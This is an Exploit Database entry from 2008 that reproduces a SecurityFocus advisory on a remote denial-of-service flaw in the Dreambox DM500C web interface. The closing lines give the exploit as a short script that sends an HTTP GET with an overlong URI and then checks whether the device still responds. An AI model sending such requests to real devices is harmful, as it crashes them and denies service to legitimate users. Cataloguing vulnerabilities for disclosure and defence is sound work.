Dreambox Web Interface URI Remote Denial of Service Vulnerability

2008-08-29T00:00:00
ID EDB-ID:32305
Type exploitdb
Reporter Marc Ruef
Modified 2008-08-29T00:00:00

Description

Dreambox Web Interface URI Remote Denial of Service Vulnerability. Dos exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/30919/info

Dreambox is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected device, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

Dreambox DM500C is vulnerable; other models may also be affected. 

open|send GET http://www.example.com/aaa(...)
HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### *